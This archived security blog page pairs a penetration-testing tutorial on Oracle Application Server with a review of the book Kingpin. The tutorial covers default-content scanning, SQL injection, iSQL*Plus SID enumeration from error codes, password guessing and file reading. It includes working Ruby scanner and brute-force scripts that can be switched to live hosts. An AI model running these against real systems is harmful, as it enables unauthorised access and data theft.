15 | October | 2011 | Certified Ethical Hackers Security Analyst Malware Hacking Information
From the daily archives: Saturday, October 15, 2011

By Chris Gates, CISSP, GCIH, C|EH, CPTS

Oracle applications are not what you’d call simple.  Any DBA or Oracle Application Server administrator will be the first to attest to that.  Oracle’s products, capable as they are, bring some unpleasantries with them.  These are:

1. Oracle applications are complicated (hopefully we all agree on this).
2. They come with loads of default content and no clear way to remove it.  There is no IISLockdown equivalent for Oracle applications; content you don’t want must be removed by hand.  Some of this content can be used to run database queries, read documents, gather information through leakage on the pages themselves, or perform XSS attacks.
3. Patches and extended advisory information require a paid support contract (and even then, Oracle releases no proof-of-concept code).
4. And lastly, the patch/upgrade process is fairly complicated, which leads to an “it’s working, don’t touch it” mentality among a fair number of admins.

This provides a target-rich environment for pentesters and bad guys alike. Let’s take a look.


One of the issues that frequently came up on my penetration tests was running into random Oracle content pages.  Here are some examples of default Oracle pages (which contain nothing useful in themselves) that appear often because they are the index pages.

Oracle HTTP Server Index Page

Oracle Application Server Portal Index Page

Obvious questions come up as soon as you discover pages like this: what default content/components exist, how do I find them, and, more importantly, how do I leverage that content to penetrate further into the network?

On public-facing servers we may catch a break and use Google and Bing hacking [www.red-database-security.com/wp/google_oracle_hacking_us.pdf ] to find some of that useful content.  This is of no help internally, though, as internal servers won’t be indexed.

A couple of default-content scanners exist out in the world: Oapscan comes to mind, Inguma has one built in, nikto has some Oracle checks, and so on.  The problem I kept running into was that I would get a 200 for some random URL but have no idea what it did, what it was for, or how to exploit it. No fun.

In the end I combined almost all the checks I could find in the various scanners and made a Metasploit auxiliary module out of them.  I also added a “vuln” field to the output, which gives me (and hopefully follow-on contributors) a place to record why that URL is useful or a reference on how to exploit it.
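As an added example (not the oracle_oas_scan.rb module itself, and not code from the original article), here is a small Ruby checker in the same spirit: each path carries its “vuln” note alongside it, and hits are reported with the note rather than as a bare 200.  The JDBCQuery.jsp path is the one this article discusses; /isqlplus is the usual iSQL*Plus location and is an assumption here, not something taken from the article.  The stub site is constructed so the script runs offline.  One caveat a practitioner will want built in: some servers answer 200 for every path, so the scanner first requests a path that cannot exist and flags the run if that also comes back 200.

```ruby
require 'net/http'
require 'uri'

# Default content worth looking for, each with a "vuln" note saying why a hit
# matters. Extend this table as you learn what other default URLs do.
# /demo/sql/jdbc/JDBCQuery.jsp is from the article; /isqlplus is the usual
# iSQL*Plus location and is an assumption here, not taken from the article.
ORACLE_DEFAULT_CONTENT = {
  '/demo/sql/jdbc/JDBCQuery.jsp' => 'demo JSP: SQL injection, runs queries against the instance',
  '/isqlplus'                    => 'iSQL*Plus: web SQL*Plus front end, SID and logins brute-forceable',
}.freeze

# Real fetcher: GET base_url + path and return [status, body].
def http_fetcher(base_url)
  lambda do |path|
    res = Net::HTTP.get_response(URI.join(base_url, path))
    [res.code.to_i, res.body.to_s]
  end
end

# Probe every path in the table. A fetcher is any callable taking a path and
# returning [status, body], so the logic can be exercised without a network.
def scan_default_content(base_url, fetcher: nil, table: ORACLE_DEFAULT_CONTENT)
  fetcher ||= http_fetcher(base_url)
  # Canary: a server that returns 200 for a path that cannot exist makes the
  # status code meaningless, so report that instead of a page full of hits.
  canary_status, = fetcher.call("/#{rand(36**12).to_s(36)}.nothere")
  catch_all = (canary_status == 200)
  hits = table.each_with_object([]) do |(path, vuln), acc|
    status, body = fetcher.call(path)
    next unless status == 200
    acc << { path: path, vuln: vuln, bytes: body.bytesize }
  end
  { catch_all: catch_all, hits: hits }
end

# Constructed stand-in for an Oracle Application Server so the example runs
# offline: two default pages present, everything else 404.
STUB_SITE = {
  '/demo/sql/jdbc/JDBCQuery.jsp' => [200, '<html><title>JDBC Query Demo</title></html>'],
  '/isqlplus'                    => [200, '<html><title>iSQL*Plus Login</title></html>'],
}.freeze

def stub_fetcher(path)
  STUB_SITE.fetch(path, [404, 'Not Found'])
end

if $PROGRAM_NAME == __FILE__
  # Pass fetcher: nil to scan a real host (the hostname below is assumed).
  result = scan_default_content('http://oas.example.internal:7777', fetcher: method(:stub_fetcher))
  puts '[!] server answers 200 for everything; status codes are not meaningful' if result[:catch_all]
  result[:hits].each { |h| puts "[+] #{h[:path]} (#{h[:bytes]} bytes) - #{h[:vuln]}" }
end
```

Against a real host, drop the `fetcher:` argument and the script goes over the network with Net::HTTP; the status-code check is deliberately the same simple “is it a 200” test the scanners above use, with the canary request as the one guard against catch-all servers.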


The idea is that, as we find documents in the Oracle web application, we also get a clue as to why each one can be useful.  A couple of the more useful pieces of default content found by our scan are below.



Based on the results of our oracle_oas_scan.rb script, we see that /demo/sql/jdbc/JDBCQuery.jsp is vulnerable to SQL Injection and allows us query information from the oracle instance.


SQL Injection in JDBCQuery.jsp and the Result Showing the Oracle SID Name

Example 2


The oracle_oas_scanner searches for this useful piece of default content.  This page allows us to run arbitrary SQL queries.

Oracle Demo Page

Example 3


iSQL*Plus is a browser-based front end to SQL*Plus that connects to the database through the TNS listener. You log in with a username, password and database SID, and you are given a text box in which you can run SQL commands, just as if you were logged into the sqlplus interface.

iSQL*Plus Login Page for Oracle DB 9 R2

Logged into iSQL*Plus

Hopefully the value of the interface is clear by now.  As with any website that requires authentication, the question becomes how to guess the credentials or bypass them.

Bring in isqlplus_sidbrute.rb and isqlplus_login.rb.

If you remember from the hacking-Oracle-via-the-TNS-listener material [ http://www.slideshare.net/chrisgates/attacking-oracle-with-the-metasploit-framework  http://www.youtube.com/watch?v=Hj7u8Ja-mPM ], we need four things to connect to and log into an Oracle instance: IP, port, username/password, and database SID.  In the case of iSQL*Plus, IP and port are taken care of: it is a web application and we’ve obviously found the page.  All that’s left is the username/password and the SID.

Luckily for us, the application responds differently to an incorrect username/password with the right SID than to an incorrect username/password with the wrong SID.  This lets us brute-force the SID field on its own, before we know any credentials.

The error message returned by Oracle tells us whether the SID was valid:

Wrong SID:
ORA-12154: TNS: could not resolve service name

Right SID (wrong password):
ORA-01017: invalid username/password; logon denied

As an added bonus, iSQL*Plus authenticates by default to the first SID in the tnsnames.ora file.  This means we can *usually* pass no SID at all, and it will try to authenticate to the top SID in tnsnames.ora.

Isqlplus_sidbrute in Action

Once we have a valid SID, or know that the application accepts a blank SID in the POST request, we can repeat the process to guess valid username/password combinations.

Isqlplus_login in Action

Once valid credentials are obtained, you can log in to the interface and run SQL commands to extract data, attempt privilege escalation attacks against the database, or conduct further post-exploitation activities against the database server.

Or, for added lolz, you can read arbitrary files off the server:
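The two-step process above (SID first, then credentials) as an added Ruby example; this is not isqlplus_sidbrute.rb or isqlplus_login.rb, and nothing here comes from the article’s code.  The classifier keys on the two ORA- codes the article quotes; ORA-12505 (listener does not know the SID) and ORA-28000 (account locked) are extra signals added here because a locked account still proves both the SID and the username exist.  The stub database, its SID and accounts, the form field names in http_prober, and the host/port in the comment are all assumptions; take the real field names from the target’s login form before pointing it at a live server.

```ruby
require 'net/http'
require 'uri'

# Turn the ORA- code in an iSQL*Plus response into what it tells us about
# the guess. ORA-12154 and ORA-01017 are the two the article relies on;
# ORA-12505 and ORA-28000 are added here as further signals worth handling.
def classify_isqlplus_response(body)
  case body
  when /ORA-12154/, /ORA-12505/ then :wrong_sid   # name/SID could not be resolved
  when /ORA-01017/ then :wrong_password           # SID resolved, logon denied
  when /ORA-28000/ then :account_locked           # SID and username both exist
  when /ORA-\d{5}/ then :other_error              # some other error, but the SID reached a database
  else :no_ora_error                              # likely logged in; confirm by hand
  end
end

# Step 1: find a SID. Every guess uses a deliberately wrong password, so any
# verdict other than :wrong_sid means the SID was accepted. A blank SID is
# tried first (when try_blank is set) because iSQL*Plus falls back to a
# default connect identifier when none is supplied.
def find_sid(candidates, prober, try_blank: true, user: 'scott', pass: 'definitely-not-it')
  guesses = (try_blank ? [''] : []) + candidates
  guesses.find do |sid|
    classify_isqlplus_response(prober.call(user, pass, sid)) != :wrong_sid
  end
end

# Step 2: with a SID in hand, walk a credential list. Returns the first
# [user, pass] that yields a page with no ORA- error, plus any accounts that
# answered "locked" on the way (real usernames, worth noting).
def find_login(sid, creds, prober)
  locked = []
  hit = creds.find do |user, pass|
    verdict = classify_isqlplus_response(prober.call(user, pass, sid))
    locked << user if verdict == :account_locked
    verdict == :no_ora_error
  end
  { login: hit, locked_accounts: locked }
end

# Real prober: POST the login form and hand back the body. The field names
# are an assumption; copy the real ones from the target's login page.
def http_prober(login_url, fields: { user: 'username', pass: 'password', sid: 'connectID' })
  uri = URI(login_url)
  lambda do |user, pass, sid|
    Net::HTTP.post_form(uri, fields[:user] => user, fields[:pass] => pass, fields[:sid] => sid).body.to_s
  end
end

# Constructed stand-in for an iSQL*Plus instance so the example runs offline:
# one database (ORCL) that is also the default connect identifier, one
# working account and one locked one. All of this is made-up test data.
STUB_DB = { sid: 'ORCL', users: { 'scott' => 'tiger' }, locked: ['outln'] }.freeze

def stub_prober(user, pass, sid)
  sid = STUB_DB[:sid] if sid.empty?   # blank SID falls back to the default identifier
  return 'ORA-12154: TNS: could not resolve service name' unless sid == STUB_DB[:sid]
  return 'ORA-28000: the account is locked' if STUB_DB[:locked].include?(user)
  return 'ORA-01017: invalid username/password; logon denied' unless STUB_DB[:users][user] == pass
  '<html><title>iSQL*Plus Workspace</title><textarea name="script"></textarea></html>'
end

if $PROGRAM_NAME == __FILE__
  # For a live target: prober = http_prober('http://host:5560/isqlplus') (host and port assumed).
  prober = method(:stub_prober)
  sid = find_sid(%w[XE TEST ORCL], prober, try_blank: false)
  puts "[+] valid SID: #{sid.inspect}"
  res = find_login(sid, [['system', 'manager'], ['outln', 'outln'], ['scott', 'tiger']], prober)
  puts "[+] login: #{res[:login].inspect}  locked accounts seen: #{res[:locked_accounts].inspect}"
end
```

The split into two functions mirrors the two modules: the SID search never needs a working password, and the login search is only run once against the SID that was accepted, which keeps the number of failed logons (and the chance of locking accounts you want) to a minimum.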

Reading Arbitrary Files from the Host

Output of the File

That’s it for now.  Enjoy using vendor created content to dig further into the network!

To get a copy or contribute to the code mentioned in the article, grab it on github through carnal0wnage https://github.com/carnal0wnage/carnal0wnage-code and in the Web eXploitation Framework https://github.com/WebExploitationFramework.

Article source: http://www.ethicalhacker.net/content/view/363/24/


Review by RichM

Kevin Poulsen has worked tirelessly to become a respected expert in the information security field and is a senior editor for Wired Magazine. Kevin edits the Threat Level blog, which covers topics mostly at the intersection of law enforcement and hacking, along with other relevant stories such as the latest goings-on with Wikileaks. The now-white-hat was not always on the straight and narrow and made a name for himself as his alter ego, “Dark Dante.”

The legend of his “exploits” is well known and has him counted amongst America’s most infamous hackers. Dark Dante’s most impressive hack was when he used his phreaking skills to win a Porsche 944. He rigged the phone lines of an LA radio station, guaranteeing he would be their 102nd caller! Kevin Poulsen and Max Butler, the person on whom the book is based, have many similarities. Both are very skilled and have a natural ability, but while one was able to find legitimate work after a conviction, the other was not. It is because of Kevin’s past that he can bring to life such a fascinating topic. Most mainstream reporters would (at best) turn this story into a 5-page magazine article, whereas Mr. Poulsen has created a suspenseful page-turner in Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground.



Max Butler (pictured on the right) is, and was, an idealist who simply wanted to help others. The problem is, he never recognized when he had gone too far until, as they say, it was too late. One day while doing research he discovered a vulnerability in the Berkeley Internet Name Domain (BIND) server. At first he was content to let others find it and report it, but once a weaponized version was found in the wild, Max felt a duty to act. He began patching every vulnerable machine he could access. While this seemed like a benevolent act, Max also patched computers owned by the United States government and military. That was the end of any shot Max Butler had at a legitimate career in information security.

Once released, Max tried to find work in the private sector. His reputation was too far gone, and no one would even take a chance on him for minimum wage! It was at this point that Max realized the only way he could make money was in the carding world. He quickly climbed the food chain, first on someone else’s site, then eventually his own. In a quest for power, he single-handedly swallowed the competition and became the only “reputable” site for stolen identities.

“Kingpin” is a 360-degree view of everything that was taking place in the carding community before most people even knew it existed. The book is a blow-by-blow account of the dark secrets of how this world operated, the main players involved, and what law enforcement did to shatter it. It is also a frightening glimpse into the power corporations had to keep breaches secret while millions of their customers’ personal records went on auction in the black market, and the victims had no idea.

Consumers were led to believe that at the beginning of the 21st century the major threat to personal identity was online; however, as you learn in Kingpin, the real threat was complacency on the part of the FBI (in not releasing the names of compromised corporations) and of the companies themselves for allowing their Point of Sale (POS) systems to have little to no security. These machines continued to store data they were not supposed to hold, and as a result consumers who didn’t even own a computer fell victim to identity theft through the gross negligence of brick-and-mortar operations.

Kingpin is a fascinating book, since, as an outsider to this world, I never had a great understanding of how carders operated. Throughout the book it is apparent that there is no honor among thieves, and those who should be the most “trusted” are either back-dooring their customers and stealing whatever they can download or informing law enforcement (LE) in an effort to eliminate competition or reduce a sentence that is already pending. Another great feature of Kingpin is that it serves as a timeline of some of the most important occurrences in information security. In addition to covering some of the higher-profile criminal cases, it also shows well-known exploits that were being leveraged with reckless abandon, such as the RealVNC 4.1.1 vulnerability. I remember that exploit all too well, as my department worked tirelessly to ensure we took all necessary precautions to mitigate it.

Final Thoughts

If there was anything negative about the book, it is the lack of explanation of the various exploits, trojans and backdoors used by Max and his friends to own the carding world. Although there is some technical information including a brief explanation of PGP, this book gives a wider view of the world of identity and credit card theft. Knowing that the desired audience is broader than just us geeks, it is understandable, yet the lack of some more hacking details is still disappointing.

That being said, Kingpin by Kevin Poulsen (pictured on the right) is a great book and one of those you have trouble putting down. It is amazing that everything in the book is factual and not some piece of fiction. Kingpin joins the quickly growing list of InfoSec books that are accessible to the outside world.

Article source: http://www.ethicalhacker.net/content/view/364/2/
